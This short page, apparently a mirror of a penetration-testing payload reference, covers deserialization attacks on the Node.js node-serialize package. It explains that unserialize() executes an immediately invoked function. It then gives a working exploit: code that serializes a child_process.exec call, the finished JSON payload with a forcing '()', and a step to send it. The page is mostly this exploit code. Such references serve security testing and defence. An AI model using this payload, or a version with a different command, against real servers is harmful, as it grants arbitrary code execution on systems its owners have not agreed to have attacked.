mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 19:36:11 +00:00
1.3 KiB
1.3 KiB
Node Deserialization
Summary
Exploit
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the
unserialize()
function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
- Generate a serialized payload
var y = { rce : function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }, } var serialize = require('node-serialize'); console.log("Serialized: \n" + serialize.serialize(y));
- Add bracket
()
to force the execution{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
- Send the payload